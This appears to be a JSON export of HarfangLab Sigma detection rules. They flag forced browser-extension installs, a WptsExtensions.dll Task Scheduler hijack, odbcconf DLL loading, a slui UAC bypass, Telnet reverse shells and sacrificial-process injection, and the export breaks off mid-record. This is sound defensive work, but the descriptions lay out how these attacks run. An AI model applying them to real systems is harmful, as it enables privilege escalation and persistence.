"content": "title: Malicious Chrome-based Browser Extension Force-installed\nid: a6cace98-683f-4957-8835-f651ff11941e\ndescription: |\n Detects a modification of the registry key used to force the installation of a known malicious extension in Chrome or Edge.\n Adversaries may force the installation of a malicious extension by modifying the registry key, leading the browser to silently install a list of apps and extensions at startup, without user interaction, and which cannot be uninstalled nor disabled by the user.\n It is recommended to check if the process modifying the registry key has legitimate reason to do it and if there is a legitimate reason to install this application.\nreferences:\n - https://www.bleepingcomputer.com/news/security/malware-force-installs-chrome-extensions-on-300-000-browsers-patches-dlls/\n - https://www.connectwise.com/blog/threat-report/smash-jacker\n - https://attack.mitre.org/techniques/T1176/\ndate: 2025/01/31\nmodified: 2025/04/10\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1176\n - attack.defense_evasion\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.SensitiveInformation\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n TargetObject|contains:\n - 'Software\\Policies\\Google\\Chrome\\ExtensionInstallForcelist'\n - 'Software\\Policies\\Microsoft\\Edge\\ExtensionInstallForcelist'\n Details: 'macjkjgieeoakdlmmfefgmldohgddpkj' # https://www.connectwise.com/blog/threat-report/smash-jacker\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a6cace98-683f-4957-8835-f651ff11941e",
"rule_name": "Malicious Chrome-based Browser Extension Force-installed",
"rule_description": "Detects a modification of the ExtensionInstallForcelist policy registry key of Chrome or Edge that adds a known malicious extension ID (currently the one reported in the Smash-Jacker campaign).\nAdversaries may force the installation of a malicious extension by writing to this policy key, leading the browser to silently install the listed apps and extensions at startup, without user interaction; such extensions cannot be uninstalled nor disabled by the user.\nBecause this key is also written legitimately (e.g. by Group Policy or endpoint-management tools), the detection is keyed on the extension ID rather than on the key write itself.\nIt is recommended to check whether the process modifying the registry key has a legitimate reason to do so and whether there is a legitimate reason to install this extension, and to remove the entry and the extension if there is none.\n",
"rule_creation_date": "2025-01-31",
"rule_modified_date": "2025-04-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1176"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a6ccbaf8-6950-4be8-ae16-ec21229b758f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095003Z",
"creation_date": "2026-03-23T11:45:34.095005Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095009Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://man7.org/linux/man-pages/man1/last.1.html",
"https://attack.mitre.org/techniques/T1033/",
"https://attack.mitre.org/techniques/T1087/001/",
"https://attack.mitre.org/techniques/T1069/001/"
],
"name": "t1033_last_linux.yml",
"content": "title: Last Logged-in Users Discovered via Last (Linux)\nid: a6ccbaf8-6950-4be8-ae16-ec21229b758f\ndescription: |\n Detects the execution of last, a tool used to gather the last session of users.\n Adversaries may use it during the discovery phase of an attack to discover new users and their activity.\n It is recommended to investigate the parent process for suspicious activities.\nreferences:\n - https://man7.org/linux/man-pages/man1/last.1.html\n - https://attack.mitre.org/techniques/T1033/\n - https://attack.mitre.org/techniques/T1087/001/\n - https://attack.mitre.org/techniques/T1069/001/\ndate: 2023/12/15\nmodified: 2025/10/08\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1033\n - attack.t1087.001\n - attack.t1069.001\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/last'\n CommandLine:\n - 'last'\n - 'lastb'\n # Filter-out missing parents\n ParentImage|contains: '?'\n GrandparentImage|contains: '?'\n\n # Exclude manual last launched from a terminal emulator\n exclusion_terminal_emulators:\n GrandparentCommandLine|endswith:\n - '/gnome-terminal-server'\n - '/terminator'\n - '/xfce4-terminal'\n - '/xterm'\n\n exclusion_fusioninventory:\n - ParentCommandLine|contains: 'fusioninventory-agent'\n - GrandparentCommandLine|contains: 'fusioninventory-agent'\n\n exclusion_ossec_logcollector:\n - ParentImage: '/var/ossec/bin/ossec-logcollector'\n - GrandparentImage: '/var/ossec/bin/ossec-logcollector'\n\n exclusion_wazuh:\n - ParentImage: '/var/ossec/bin/wazuh-logcollector'\n - GrandparentImage|endswith: '/ossec/bin/wazuh-logcollector'\n\n exclusion_zabbix:\n GrandparentImage:\n - '/usr/sbin/zabbix_agentd'\n - '/usr/sbin/zabbix_agent2'\n\n exclusion_mtxagent:\n ParentImage|endswith: '/bmc-software/client-management/client/bin/mtxagent'\n\n exclusion_ocsinventory:\n - ParentCommandLine|startswith:\n - 
'/usr/bin/perl */usr/bin/ocsinventory-agent'\n - '/usr/bin/perl */usr/sbin/ocsinventory-agent'\n - '/usr/bin/perl */usr/local/bin/ocsinventory-agent'\n - GrandparentCommandLine|startswith:\n - '/usr/bin/perl */usr/bin/ocsinventory-agent'\n - '/usr/bin/perl */usr/sbin/ocsinventory-agent'\n - '/usr/bin/perl */usr/local/bin/ocsinventory-agent'\n - '/bin/bash /etc/cron.*/ocsinventory-agent'\n\n exclusion_prodigeadmin:\n GrandparentCommandLine|startswith: '/bin/bash /prodige/admin/prodigeadmin/.pgih-bootstrap/'\n\n exclusion_glpi_agent:\n - ParentCommandLine:\n - 'glpi-agent: waiting'\n - 'glpi-agent (tag *): *'\n - '/usr/bin/perl /usr/bin/glpi-agent *'\n - 'glpi-agent: running *'\n - 'glpi-agent: task *'\n - GrandparentCommandLine:\n - 'glpi-agent: waiting'\n - 'glpi-agent (tag *): *'\n - '/usr/bin/perl /usr/bin/glpi-agent*'\n - 'glpi-agent: running *'\n - 'glpi-agent: task *'\n\n exclusion_tanium:\n - ParentCommandLine|startswith:\n - '/bin/sh /opt/tanium/taniumclient/'\n - '/bin/bash /opt/Tanium/TaniumClient/'\n - ProcessAncestors|contains: '|/opt/Tanium/TaniumClient/TaniumClient'\n\n exclusion_atempo:\n ProcessGrandparentImage: '/opt/Atempo/HN/bin/HNagent'\n\n exclusion_qualys:\n - ProcessParentImage:\n - '/usr/local/qualys/cloud-agent/bin/qualys-scan-util'\n - '/usr/local/qualys/cloud-agent/bin/qualys-cloud-agent'\n - ProcessGrandparentImage:\n - '/usr/local/qualys/cloud-agent/bin/qualys-scan-util'\n - '/usr/local/qualys/cloud-agent/bin/qualys-cloud-agent'\n - ProcessAncestors|contains:\n - '|/usr/local/qualys/cloud-agent/bin/qualys-scan-util|'\n - '|/usr/local/qualys/cloud-agent/bin/qualys-cloud-agent|'\n\n exclusion_aemagent:\n ProcessGrandparentImage: '/usr/local/share/CentraStage/AEMAgent/AEMAgent'\n\n exclusion_run-parts:\n ProcessGrandparentImage: '/usr/bin/run-parts'\n\n exclusion_nable:\n ProcessGrandparentImage: '/usr/sbin/nagent'\n ProcessGrandparentCommandLine|contains: '/usr/sbin/nagent -f */nagent/nagent.conf'\n\n exclusion_ansible:\n CurrentDirectory: 
'/home/ansible/'\n ProcessAncestors|contains: '|/usr/sbin/sshd|'\n\n exclusion_sed:\n ParentImage: '/usr/bin/sed'\n\n exclusion_snmpd:\n ParentImage: '/usr/sbin/snmpd'\n\n # https://ciscat-assessor.docs.cisecurity.org/\n exclusion_ciscat:\n GrandparentImage|endswith: '/bin/java'\n GrandparentCommandLine|contains: ' -jar Assessor-CLI.jar '\n\n exclusion_nessus:\n ProcessAncestors|contains:\n - '|/opt/nessus_agent/sbin/nessusd|'\n - '|/opt/nessus/sbin/nessusd|'\n\n exclusion_sosreport:\n GrandparentCommandLine|startswith:\n - '/usr/bin/python* /sbin/sosreport'\n - '/usr/bin/python* /usr/sbin/sosreport'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a6ccbaf8-6950-4be8-ae16-ec21229b758f",
"rule_name": "Last Logged-in Users Discovered via Last (Linux)",
"rule_description": "Detects the execution of last (or lastb), a tool that lists the most recent login sessions of users from the system login records (wtmp; lastb reads the failed-login records in btmp).\nAdversaries may use it during the discovery phase of an attack to enumerate existing accounts, their login activity and the hosts they connect from.\nBecause last is also run routinely by inventory, monitoring and compliance agents (several of which the rule excludes), it is recommended to investigate the parent process and the wider process ancestry for suspicious activities.\n",
"rule_creation_date": "2023-12-15",
"rule_modified_date": "2025-10-08",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1033",
"attack.t1069.001",
"attack.t1087.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a6fc5220-9841-48e3-8d9e-6ef2f233f780",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088475Z",
"creation_date": "2026-03-23T11:45:34.088477Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088481Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.a12d404.net/windows/2019/10/30/schedsvc-persist-without-task.html"
],
"name": "t1574_002_prepare_persistence_dll_hijack_task_scheduler_wptsextensions.yml",
"content": "title: Task Scheduler Service DLL Hijack Prepared\nid: a6fc5220-9841-48e3-8d9e-6ef2f233f780\ndescription: |\n Detects the creation of a DLL named WptsExtensions.dll. The Task Scheduler service (schedsvc, running as SYSTEM inside svchost.exe) searches the directories of the system PATH for a DLL of this name, which Windows does not ship, so a DLL planted under that name in any PATH directory gets loaded by the service: a DLL hijack.\n Adversaries may plant the DLL in a PATH folder, in particular one writable by a low-privileged user, in order to execute malicious code with SYSTEM privileges within the context of the scheduler service and to persist without creating a scheduled task.\n It is recommended to check the DLL for malicious content or purpose, to analyze the process responsible for its creation, to verify whether the target directory is in the system PATH and who can write to it, and to remove the file before the service next starts.\nreferences:\n - https://www.a12d404.net/windows/2019/10/30/schedsvc-persist-without-task.html\ndate: 2020/09/28\nmodified: 2025/02/18\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.002\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path|endswith: '\\WptsExtensions.dll'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a6fc5220-9841-48e3-8d9e-6ef2f233f780",
"rule_name": "Task Scheduler Service DLL Hijack Prepared",
"rule_description": "Detects the creation of a DLL named WptsExtensions.dll. The Task Scheduler service (schedsvc, running as SYSTEM inside svchost.exe) searches the directories of the system PATH for a DLL of this name, which Windows does not ship, so a DLL planted under that name in any PATH directory gets loaded by the service: a DLL hijack.\nAdversaries may plant the DLL in a PATH folder, in particular one writable by a low-privileged user, in order to execute malicious code with SYSTEM privileges within the context of the scheduler service and to persist without creating a scheduled task.\nIt is recommended to check the DLL for malicious content or purpose, to analyze the process responsible for its creation, to verify whether the target directory is in the system PATH and who can write to it, and to remove the file before the service next starts.\n",
"rule_creation_date": "2020-09-28",
"rule_modified_date": "2025-02-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a7400b79-0aa3-4d56-849c-cae54769dd2a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088591Z",
"creation_date": "2026-03-23T11:45:34.088593Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088598Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/",
"https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/",
"https://attack.mitre.org/techniques/T1218/008/"
],
"name": "t1218_odbcconf.yml",
"content": "title: Odbcconf.exe Execution\nid: a7400b79-0aa3-4d56-849c-cae54769dd2a\ndescription: |\n Detects the execution of the legitimate \"odbcconf.exe\" Windows binary, a command-line tool used to configure ODBC drivers and data source names, with an action (/a) or response file (/f) argument.\n This binary can be used as a LOLBin to load an arbitrary DLL, e.g. through its REGSVR action given either on the command line or inside a response file, so that attacker code runs under a signed Microsoft binary and may evade application control.\n It is recommended to investigate the DLL loaded by \"odbcconf.exe\", to retrieve and inspect any response file passed with /f since the actions it contains do not appear on the command line, and to review the parent process for suspicious activities.\nreferences:\n - https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/\n - https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/\n - https://attack.mitre.org/techniques/T1218/008/\ndate: 2022/06/30\nmodified: 2025/03/27\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.008\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Odbcconf\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'odbcconf.exe'\n CommandLine|contains:\n - ' /f '\n - ' -f '\n - ' /a '\n - ' -a '\n\n exclusion_sql:\n CommandLine|contains:\n - 'CONFIGSYSDSN ODBC Driver'\n - 'CONFIGSYSDSN MySQL ODBC'\n - 'CONFIGDSN SQL Server'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a7400b79-0aa3-4d56-849c-cae54769dd2a",
"rule_name": "Odbcconf.exe Execution",
"rule_description": "Detects the execution of the legitimate \"odbcconf.exe\" Windows binary, a command-line tool used to configure ODBC drivers and data source names, with an action (/a) or response file (/f) argument.\nThis binary can be used as a LOLBin to load an arbitrary DLL, e.g. through its REGSVR action given either on the command line or inside a response file, so that attacker code runs under a signed Microsoft binary and may evade application control.\nIt is recommended to investigate the DLL loaded by \"odbcconf.exe\", to retrieve and inspect any response file passed with /f since the actions it contains do not appear on the command line, and to review the parent process for suspicious activities.\n",
"rule_creation_date": "2022-06-30",
"rule_modified_date": "2025-03-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218.008"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a790c44e-924f-45f9-9524-04a2235c5441",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092575Z",
"creation_date": "2026-03-23T11:45:34.092579Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092586Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/windows/local/bypassuac_sluihijack",
"https://mattharr0ey.medium.com/privilege-escalation-uac-bypass-in-changepk-c40b92818d1b",
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md#atomic-test-17---uacme-bypass-method-61"
],
"name": "t1548_002_post_uac_bypass_slui.yml",
"content": "title: UAC Bypass Executed via slui\nid: a790c44e-924f-45f9-9524-04a2235c5441\ndescription: |\n Detects an unusual process being spawned by slui.exe.\n This alert can be indicative of a successful User Account Control Bypass and is the result of the execution of slui.exe after a registry modification.\n Adversaries may bypass UAC mechanisms to elevate process privileges on a system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to investigate for suspicious registry modification by the process launching slui.exe near its execution and to look for other suspicious actions on the host.\nreferences:\n - https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/windows/local/bypassuac_sluihijack\n - https://mattharr0ey.medium.com/privilege-escalation-uac-bypass-in-changepk-c40b92818d1b\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md#atomic-test-17---uacme-bypass-method-61\ndate: 2022/12/05\nmodified: 2025/05/02\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.UACBypass\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_parent_slui:\n ParentImage|endswith: '\\slui.exe'\n\n selection_parent_changepk:\n GrandparentImage|endswith: '\\slui.exe'\n ParentImage|endswith: '\\changepk.exe'\n\n exclusion_slui_legitimate:\n Image:\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe'\n - '?:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe'\n - '?:\\Program Files\\Google\\Chrome\\Application\\chrome.exe'\n - '?:\\Program Files (x86)\\Internet Explorer\\iexplore.exe'\n - 
'?:\\Program Files\\Internet Explorer\\iexplore.exe'\n - '?:\\Program Files\\Mozilla Firefox\\firefox.exe'\n - '?:\\Windows\\System32\\LicensingUI.exe'\n - '?:\\Windows\\System32\\slui.exe'\n - '?:\\Windows\\System32\\changepk.exe'\n - '?:\\Windows\\System32\\phoneactivate.exe'\n\n exclusion_changepk_legitimate:\n Image: '?:\\Windows\\System32\\ClipUp.exe'\n\n exclusion_common_werfault:\n Image: '?:\\Windows\\System32\\WerFault.exe'\n CommandLine|contains: '\\WerFault.exe -u -p '\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n condition: ((selection_parent_slui and not exclusion_slui_legitimate) or (selection_parent_changepk and not exclusion_changepk_legitimate)) and not 1 of exclusion_common_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a790c44e-924f-45f9-9524-04a2235c5441",
"rule_name": "UAC Bypass Executed via slui",
"rule_description": "Detects an unusual process being spawned by slui.exe, or by changepk.exe when changepk.exe was itself launched by slui.exe.\nBoth are auto-elevating Windows binaries: this alert can be indicative of a successful User Account Control bypass, in which slui.exe is executed after a registry modification made by the attacker (typically a hijacked per-user file-association handler under HKCU\\Software\\Classes), so that the elevated process launches an attacker-controlled executable instead of the expected one.\nAdversaries may bypass UAC mechanisms to elevate process privileges on a system without any user prompt.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to investigate the spawned process, to look for suspicious registry modifications by the process launching slui.exe shortly before its execution, and to look for other suspicious actions on the host.\n",
"rule_creation_date": "2022-12-05",
"rule_modified_date": "2025-05-02",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a7bd8bcc-8022-4b14-8b39-d2bbe5dcc6ac",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.484003Z",
"creation_date": "2026-03-23T11:45:34.088536Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088541Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1046/",
"https://attack.mitre.org/techniques/T1049/",
"https://attack.mitre.org/techniques/T1095/",
"https://attack.mitre.org/techniques/T1021/",
"https://gtfobins.github.io/gtfobins/telnet/"
],
"name": "t1046_telnet_linux.yml",
"content": "title: Telnet Execution\nid: a7bd8bcc-8022-4b14-8b39-d2bbe5dcc6ac\ndescription: |\n Detects the execution of a Telnet client. Telnet is a legacy remote-access protocol that transmits all data, including credentials, as cleartext across network connections.\n Beyond being insecure, the client is used by attackers for discovery, usually by banner-grabbing arbitrary TCP ports and attempting logins against exposed services, for interactive access to legacy remote services, and as a generic TCP connector for reverse shells or command-and-control channels (see the GTFOBins reference).\n It is recommended to investigate the parent process for suspicious activities, as well as the destination host and port and the data exchanged over the connection.\nreferences:\n - https://attack.mitre.org/techniques/T1046/\n - https://attack.mitre.org/techniques/T1049/\n - https://attack.mitre.org/techniques/T1095/\n - https://attack.mitre.org/techniques/T1021/\n - https://gtfobins.github.io/gtfobins/telnet/\ndate: 2023/01/03\nmodified: 2026/03/20\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1046\n - attack.t1049\n - attack.command_and_control\n - attack.t1095\n - attack.lateral_movement\n - attack.t1021\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.LOLBin.telnet\n - classification.Linux.Behavior.NetworkActivity\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith:\n - '/telnet.netkit'\n - '/telnet'\n # Filter-out missing parents\n ParentImage|contains: '?'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '|/usr/sbin/crond|'\n - '|/usr/bin/containerd-shim-runc-v2|'\n - '|/opt/oneautomation/*/smgr/bin/ucybsmgr|'\n\n exclusion_commandline:\n - ParentCommandLine: '/bin/ksh /opt/application/*.sh *'\n - GrandparentCommandLine:\n - '/bin/bash /usr/local/scripts/*.sh'\n - '/bin/bash /opt/application/*.ksh *'\n\n exclusion_rancid:\n - CurrentDirectory|startswith: '/usr/local/rancid/'\n ProcessCommandLine|startswith: 'telnet -K '\n - Ancestors|contains: '|/usr/local/rancid/bin/par|'\n\n # template_exclusion_ansible\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a7bd8bcc-8022-4b14-8b39-d2bbe5dcc6ac",
"rule_name": "Telnet Execution",
"rule_description": "Detects the execution of a Telnet client. Telnet is a legacy remote-access protocol that transmits all data, including credentials, as cleartext across network connections.\nBeyond being insecure, the client is used by attackers for discovery, usually by banner-grabbing arbitrary TCP ports and attempting logins against exposed services, for interactive access to legacy remote services, and as a generic TCP connector for reverse shells or command-and-control channels (see the GTFOBins reference).\nIt is recommended to investigate the parent process for suspicious activities, as well as the destination host and port and the data exchanged over the connection.\n",
"rule_creation_date": "2023-01-03",
"rule_modified_date": "2026-03-20",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.discovery",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021",
"attack.t1046",
"attack.t1049",
"attack.t1095"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a81d1443-7fa0-450c-b4f2-b2ecffec3fb2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079384Z",
"creation_date": "2026-03-23T11:45:34.079386Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079390Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://research.checkpoint.com/2023/rhadamanthys-v0-5-0-a-deep-dive-into-the-stealers-components/",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_sacrificial_process_oobe_maintenance.yml",
"content": "title: OOBE-Maintenance.exe Sacrificial Process Spawned\nid: a81d1443-7fa0-450c-b4f2-b2ecffec3fb2\ndescription: |\n Detects the suspicious execution of the legitimate Windows binary OOBE-Maintenance.exe spawned without arguments, from a parent other than explorer.exe or sihost.exe. This can mean that the binary is being used as a sacrificial process.\n Such processes are spawned and malicious code is immediately injected into them, so that the payload runs under the identity of a signed Microsoft binary and evades process-based detection.\n This technique is used by Rhadamanthys, an information stealer which is being distributed mostly via malicious Google advertisements.\n It is recommended to investigate the parent process performing this action, the network activities performed by the OOBE-Maintenance.exe process, and its memory for injected code (e.g. executable regions not backed by a file on disk) to determine the legitimacy of this behavior.\nreferences:\n - https://research.checkpoint.com/2023/rhadamanthys-v0-5-0-a-deep-dive-into-the-stealers-components/\n - https://attack.mitre.org/techniques/T1055/\ndate: 2024/03/27\nmodified: 2025/02/13\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SacrificialProcess\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine: '?:\\Windows\\System32\\OOBE-Maintenance.exe'\n\n filter_parent:\n ParentImage:\n - '?:\\Windows\\explorer.exe'\n - '?:\\Windows\\System32\\sihost.exe'\n\n # https://houseonthehill.com/\n exclusion_supdskcs:\n OriginalFileName: 'SupDskCs.exe'\n Description: 'SupportDesk Desktop'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a81d1443-7fa0-450c-b4f2-b2ecffec3fb2",
"rule_name": "OOBE-Maintenance.exe Sacrificial Process Spawned",
